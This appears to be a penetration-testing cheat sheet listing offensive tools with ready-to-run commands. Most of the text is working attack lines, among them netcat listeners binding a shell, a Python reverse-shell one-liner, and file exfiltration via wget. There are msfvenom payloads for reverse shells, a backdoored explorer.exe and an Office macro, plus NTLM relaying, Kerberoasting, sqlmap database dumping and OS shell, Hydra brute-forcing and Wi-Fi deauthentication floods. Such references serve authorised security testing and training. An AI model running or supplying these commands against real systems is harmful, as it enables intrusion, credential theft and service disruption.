Reference List
CrackMapExec – is a post-exploitation tool that helps automate assessing the security of large Active Directory networks. It automates the hit and miss when trying to login to several computers in the network [Link].
sudo apt-get install crackmapexec -y
If you already have credentials:
crackmapexec smb 10.0.0.0/24 -u Administrator -p 'Pa$$w0rd1!' -d WORKGROUP
If you only have the hash:
crackmapexec smb 10.0.0.0/24 -u Administrator -H asd3b4...89c0
Replace ‘asd3b4…89c0‘ by long hash you’ve got.
Responder – Exploits SMB vulnerabilities [Link] and deprecated at [Link].
locate Responder.py cd /usr/share/responder/ python Responder.py -I eth0 -rdw -v
ntlmrelayx – it relays the received NTLM hash to a target IP that is inside the file target.txt to get access to SMD shared using somebody else’s credentials.
locate ntlmrelayx.py cd /opt/impacket/examples python ntlmrelayx.py -tf target.txt -smb2support
GPP-Decrypt – Decrypts GPP passwords.
gpp-decrypt edBS...lVmQ
Replace the ‘edBS…lVmQ’ by the
GetUserSPNs – as part of Kerberoast attack it finds Service Principal Names that are associated with a normal user account, this could be used for an offline brute-forcing attack of the SPNs account NTLM hash if we can gather valid TGS for those SPNs [Link].
pythin GetUserSPNs.py Domain/User -dc-ip 10.0.0.1 -request Password: *******
HashCat64 – powerful brute force hash cracker, such as the hash acquired from the GetUserSPNs above or another source [Link].
hashcat64.exe --help hashcat64.exe -m 13100 kerberoast.txt rockyou.txt
HashCat – Password cracker [Link].
sudo apt install hashcat hashcat -m 5600 hash.txt rockyou.txt hashcat -m 5600 hash.txt rockyou.txt --force hashcat -I hashcat -d 1,2 -m 2500 -w 3 --status -a 6 wpa2_handshake.hccapx wordlist.txt hashcat jwt.txt -m 16500 -a 0 rockyou.txt -r OneRuleToRuleThemAll.rule
Note that the hash captured with the Responder was copied to the hash.txt file and the mode 5600 used is for NetNTLMv2. Check the module compatible with the type of hash you are working on with –help. The last thing is the password’s list given rockyou.txt, you can also use another popular list called BreachParse.
After, in the fourth line, it gets the list of CPUs and GPUs with the attribute -I and inform that wants to use the computing devices 1 and 2, then define module 2500 for WPA/WPA2, and performance 3 (1-4), and other parameters.
Get the OneRuleToRuleThemAll from [Link].
NetCat – NC is a tool that makes it easy to create over the network a series of functionalities such as chat, file transfer, remote shell, portscan, and more [Link].
Server Side (Listener):
nc -nvlp 8080 nc -n -v -l -p 5555 -e /bin/bash nc -n -v -l -p 5555 -e cmd.exe nc -l -p 1234 > receive.file
Client-Side:
nc -nv 10.0.0.1 5555 nc -zv domain.com 80-88 nc -w 3 10.0.0.1 1234 < send.file
Also can be accessed by other tools such as:
wget --post-file=file.txt 10.0.0.1 8080 /bin/bash -c '(while ! nc -z -v -w1 localhost 22 2>/dev/null; do echo "Waiting for port 22 to open ..."; sleep 2; done); sleep 2'
Getting a reverse shell with Python:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",53));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Veil-Framework – a tool designed to generate Metasploit payloads that bypass common anti-virus solutions [Link].
git clone https://github.com/Veil-Framework/Veil.git cd Veil/ ./config/setup.sh --force --silent
msfVenom – it is a framework to create and encrypt payloads. Note for EXITFUNC: thread (clean exit), process (restarts it on exit), seh (restart the process when an error occurs).
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 EXITFUNC=thread -f c -a x86 -b "\x00"
The first example above creates a payload and uses arguments to define file type ‘c‘, architecture 32 bits, and also sends a bad character ‘\x00‘. There is no output file, so all the assembly code will be printed on the screen to be copied.
msfvenom -p windows/x64/meterpreter/reverse_http EXITFUNC=thread LPORT=4444 LHOST=10.0.0.1 -f raw -o payload.bin --smallest
In the example above the payload is set to the format ‘raw‘, the output file is defined as ‘payload.bin‘, and will try to create the smallest shellcode possible.
msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3 -f python -n 26
The command above creates a payload with ‘3‘ iterations of the ‘shikata_ga_nai‘ encoder without any null bytes and in ‘python‘, and add ‘26‘ NOPs at the beginning of the file.
msfvenom -a x86 --platform windows -x explorer.exe -k -p windows/shell/bind_tcp lhost=10.0.0.1 -b "\x00" -f exe -o explorer_backdoor.exe
The preview command input the existent ‘explorer.exe‘ and with the argument ‘-k‘ specifies that the payload will run in a separate thread. It outputs the new file ‘explorer_backdoor.exe‘ with the appended payload.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=eth0 LPORT=4444 -f exe > shell.exe
On the example above it just create a Meterpreter reverse shell file type exe but instead of passing the IP it leaves to the msfvenom to get what is the IP associated with the interface eth0.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=eth0 LPORT=53 -f vba -o macro.vba
The last example creates a macro to be run at Microsoft Office tools.
Mentalist – creates passwords list using sets of rules and can also import preview list such as CUPP’s output [Link].
mentalist
CUPP – the Common User Passwords Profiler creates a list of possible passwords based on given information such as giver names, last names, nicknames, birthdates… about the victim and its significant people [Link].
sudo python cupp.py -i
Skipfish – a website spider/crawler that can also test for various vulnerable parameters and configurations.
skipfish -YO -o ~/Desktop/folder http://192.168.x.x
Grabber – spider/crawler canner and test for SQLi (SQL Injection) and XXS (Cross-Site Scripting).
grabber --spider 1 --sql --xss --url http://example.com
Httrack – download recursively the website creating a local mirror.
httrack http://example.com –O ~/Desktop/file
Note: this functionality can also be done with wget as follows. The default depth is 5 and the example sets as 10:
wget -r -l 10 http://example.com
Wafw00f – detect the presence of a Web App Firewall.
wafw00f http://example.com
Hydra – A brute-force login cracker that supports numerous protocols: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP [Link]
hydra -l userName -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 5 10.0.0.1 ssh hydra -L users.lst -P /usr/share/wordlists/rockyou.txt ftp://10.0.0.1 hydra -L usernames.txt -P passwords.txt 10.0.0.1 http-post-form '/login.php:username=^USER^&password=^PASS^:F=incorrect' -v
The first example above try to guess the password for ‘user‘ using one of the Metasploit’s passwords list (unix_passwords.txt), with 5 threads over SSH.
The second example will try to login on a webpage
pw-Inspector – Used to filter the passwords in a word list to meet length criteria (from 6 to 10 characters on the following example).
pw-inspector -i whole_wordlist.txt -o filtered_list.txt -m 6 -M 10
MACof – Used to flood a switch with random MAC addresses.
macof macof -n 100 macof -i eth0 -d 192.168.1.1 -y 80
Sublist3r – Tool designed to enumerate (passively) subdomains of websites using OSINT [Link].
sublist3r -d example.com -t 5 -e bing
Nessus – A powerful professional scan [Link].
sudo systemctl start nessusd.service https://localhost:8834/
XSSer – an automatic framework to detect, exploit and report XSS vulnerabilities in web-based applications.
sudo apt install xsser
xsser --gtk
xsser --url "http://127.0.0.1/login.php" -p "user=XSS&password=secret"
xsser --url "http://127.0.0.1/login.php" -p "user=XSS&password=secret" --auto
xsser --url "http://127.0.0.1/login.php" -p "user=XSS&password=secret" -Fp "<script>alert('vulnerable!')</script>"
xsser --url "http://127.0.0.1/login.php?user=XSS&password=secret"
xsser --url "http://127.0.0.1/login.php?user=XSS&password=secret" -Fp "<script>alert('vulnerable!')</script>"
Replace the content of the variable by XSS to inform XSSer where it should inject the payloads.
SQLmap – automates the process of detecting and exploiting SQL injection flaws and taking over database servers [Link].
sudo apt install sqlmap python sqlmap.py --help sqlmap -u "https://example.com/search.php?q=" sqlmap -u "https://example.com/search.php?q=" --level=5 --risk=3 sqlmap -u "https://example.com/search.php?q=" --dbs --all --threads=10 sqlmap --url="https://example.com/login.php" --data="user=test&password=test" sqlmap -u "https://example.com/search.php?q=" --batch --banner sqlmap -u "https://example.com/search.php?q=" --batch --passwords sqlmap -u "https://example.com/search.php?q=" --batch --dbs sqlmap -u "https://example.com/search.php?q=" --batch --tables -D dbName sqlmap -u "https://example.com/search.php?q=" --batch --dump -T tableName -D dbName sqlmap -u "https://example.com/search.php?q=" --batch --os-shell
Note the level (1-5) and risk (1-3) of tests to perform, dbs for extracting the database names, all for retrieving everything, and threads (1-10) to speed up the attack. In the last example data provides the POST variables.
DirBuster – designed to brute force directories and files names on web/application servers.
dirb https://example.com/ dirb https://example.com/ wordslist.txt OR # also available with GUI
MDK3 – exploits common wifi weaknesses, such as brute-force to reveal hidden SSID, beacon flood, authentication DoS, deauthentication, WPA downgrade, cancel all traffic continuously, stress test, and more.
sudo apt install mdk3 sudo mdk3 wlan0mon a sudo mdk3 wlan0mon d -c 6 -b mac_list.txt sudo mdk3 wlan0mon p -t 00:00:00:00:00:00 -f ssid_list.txt
Note: on the third line it is flooding channel 6 with beacon messages using the mac_list.txt file to unauthenticated the users. On the fourth line replace 00:00:00:00:00:00 with the MAC of the access point running the hidden SSID and ssid_list.txt with list file for brute-forcing.
Sherlock – Gathering Open Source Intelligence (OSINT) tool. Finds if someone based on its username has a social network account with that username [Link].
sudo apt install sherlock sherlock --tomeout 1 username
MasScan – A mass scanner powerful enogth to scan the whole Internet. Be prudent while using this tool, scan unauthorized networks is a crime [Link].
masscan 0.0.0.0/0 --port 12345 --rate 1000000 -oX output.txt --exclude private_netowrks.txt
The output.txt will be in XML format and the exclude attribute will prevent to try scanning non-public network ranges. See the private_netowrks.txt:
10.0.0.0/8 172.16.0.0/12 192.168.0.0/16